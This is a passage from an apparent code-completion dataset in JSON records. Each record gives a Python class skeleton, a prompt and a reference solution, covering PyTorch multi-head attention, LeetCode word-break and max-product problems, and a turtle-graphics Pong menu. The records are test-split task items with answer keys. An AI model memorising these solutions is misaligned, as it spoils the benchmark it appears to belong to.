MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\n- def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use", "prompted_full_text": "Implement the Python class `MultiheadAttentionContainer` described below.\n\nClass description:\nImplement the MultiheadAttentionContainer class.\n\nMethod signatures and docstrings:\n- def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None: A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\n- def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\n\n<|skeleton|>\nclass MultiheadAttentionContainer:\n\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n <|body_0|>\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n<|end_body_0|>\n\n<|body_start_1|>\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n<|end_body_1|>\n", "revision_id": "45e4b8ca3615016625de15326a14668c8b58595d", "skeleton": "<|skeleton|>\nclass MultiheadAttentionContainer:\n\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n <|body_0|>\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultiheadAttentionContainer:\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n", "source": "the_stack_v2_python_sparse", "source_path": "torchtext/nn/modules/multiheadattention.py", "source_repo": "pytorch/text", "split": "test", "star_events_count": 3640} {"blob_id": "cf0a99d362c3982a82258fef1c7ad9b13fa50320", "bodies": ["n = len(s)\nt = [None for i in range(n)]\nreturn self.word_break_aux(s, wordDict, n - 1, t)", "if s[:i + 1] in wordDict:\n return True\nelif t[i] is not None:\n return t[i]\nelse:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False"], "bodies_text": "<|body_start_0|>\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n<|end_body_0|>\n\n<|body_start_1|>\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n <|body_0|>\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n<|end_body_0|>\n\n<|body_start_1|>\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000474", "length_bytes": 1231, "license_type": "permissive", "methods": [{"docstring": ":type s: str :type wordDict: Set[str] :rtype: bool", "name": "wordBreak", "signature": "def wordBreak(self, s, wordDict)"}, {"docstring": "Determine if s[:i + 1] can be segmented by dict wordDict", "name": "word_break_aux", "signature": "def word_break_aux(self, s, wordDict, i, t)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003232", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def wordBreak(self, s, wordDict): :type s: str :type wordDict: Set[str] :rtype: bool\n- def word_break_aux(self, s, wordDict, i, t): Determine if s[:i + 1] can be segmented by dict wordDict", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def wordBreak(self, s, wordDict): :type s: str :type wordDict: Set[str] :rtype: bool\n- def word_break_aux(self, s, wordDict, i, t): Determine if s[:i + 1] can be segmented by dict wordDict\n\n<|skeleton|>\nclass Solution:\n\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n <|body_0|>\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n<|end_body_0|>\n\n<|body_start_1|>\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n<|end_body_1|>\n", "revision_id": "38acc65fa4315f86acb62874ca488620c5d77e17", "skeleton": "<|skeleton|>\nclass Solution:\n\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n <|body_0|>\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "word_break/solution2.py", "source_repo": "mahimadubey/leetcode-python", "split": "test", "star_events_count": 0} {"blob_id": "52685abb0d8914dff0d4ba1bdc044e9ef07cd4e9", "bodies": ["N = len(nums)\nif N == 1:\n return nums[0]\ndpmax = [0 for i in range(N)]\ndpmin = [0 for i in range(N)]\ndpmax[0] = nums[0]\ndpmin[0] = nums[0]\nres = nums[0]\nfor i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\nreturn res", "N = len(nums)\nnumsTemp = nums[::-1]\nres = nums[0]\ntmp = nums[0]\nfor i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\ntmp = numsTemp[0]\nres2 = numsTemp[0]\nfor i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\nreturn max(res, res2)", "reverse_nums = nums[::-1]\nfor i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\nreturn max(nums + reverse_nums)"], "bodies_text": "<|body_start_0|>\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n<|end_body_1|>\n\n<|body_start_2|>\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n <|body_0|>\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n <|body_1|>\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n<|end_body_1|>\n\n<|body_start_2|>\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000475", "length_bytes": 1637, "license_type": "no_license", "methods": [{"docstring": "使用动规,也就是 :param nums: :return:", "name": "maxProduct", "signature": "def maxProduct(self, nums)"}, {"docstring": "使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:", "name": "maxProduct", "signature": "def maxProduct(self, nums)"}, {"docstring": "为什么最后是加号???? :param nums: :return:", "name": "maxProduct", "signature": "def maxProduct(self, nums)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004193", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProduct(self, nums): 使用动规,也就是 :param nums: :return:\n- def maxProduct(self, nums): 使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\n- def maxProduct(self, nums): 为什么最后是加号???? :param nums: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProduct(self, nums): 使用动规,也就是 :param nums: :return:\n- def maxProduct(self, nums): 使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\n- def maxProduct(self, nums): 为什么最后是加号???? :param nums: :return:\n\n<|skeleton|>\nclass Solution:\n\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n <|body_0|>\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n <|body_1|>\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n<|end_body_1|>\n\n<|body_start_2|>\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n<|end_body_2|>\n", "revision_id": "d8ad2da776066ac3fd99f246cb2b41a921c21a73", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n <|body_0|>\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n <|body_1|>\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n", "source": "the_stack_v2_python_sparse", "source_path": "Python/LeetCode/LeetCode152maxProduct.py", "source_repo": "540928898/LeetCodeMe", "split": "test", "star_events_count": 0} {"blob_id": "fa9ecb79eaa4d0c628c6e72fd3c6744e7d1b0eca", "bodies": ["super().__init__(visible=False)\nself.color('white')\nself.shape('square')\nself.setheading(90)\nself.shapesize(0.1, 1)\nself.speed(0)\nself.penup()\nself.pensize(3)\nself.game = game\nself.court = self.game.court\nself.court.onscreenclick(self.click)\nself.font_size = None", "self.penup()\nself.goto(-self.court.width, -self.court.height / 2)\nself.pendown()\nself.goto(self.court.width, -self.court.height / 2)\nself.penup()\nself.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\nself.pendown()\nself.goto(self.court.width, self.court.height / 2 - self.court.score_height)\nself.penup()\nself.goto(0, self.court.height / 2 - self.court.score_height)\nself.pendown()\nself.goto(0, -self.court.height / 2)\nself.penup()", "self.font_size = int(self.court.score_height / 4)\nself.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\nself.write('Play', font=('Monospace', self.font_size, 'bold'))", "self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\nself.stamp()\nself.goto(5, self.court.height / 2 - self.court.score_height / 2)\nself.stamp()", "print(x, y)\nif -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\nif -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()"], "bodies_text": "<|body_start_0|>\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n<|end_body_1|>\n\n<|body_start_2|>\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n<|end_body_2|>\n\n<|body_start_3|>\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n<|end_body_3|>\n\n<|body_start_4|>\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n<|end_body_4|>\n", "class_docstring": "", "class_name": "Menu", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Menu:\n\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n <|body_0|>\n\n def border(self):\n \"\"\"Create court border\"\"\"\n <|body_1|>\n\n def play(self):\n \"\"\"Create play button\"\"\"\n <|body_2|>\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n <|body_3|>\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n<|end_body_1|>\n\n<|body_start_2|>\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n<|end_body_2|>\n\n<|body_start_3|>\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n<|end_body_3|>\n\n<|body_start_4|>\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n 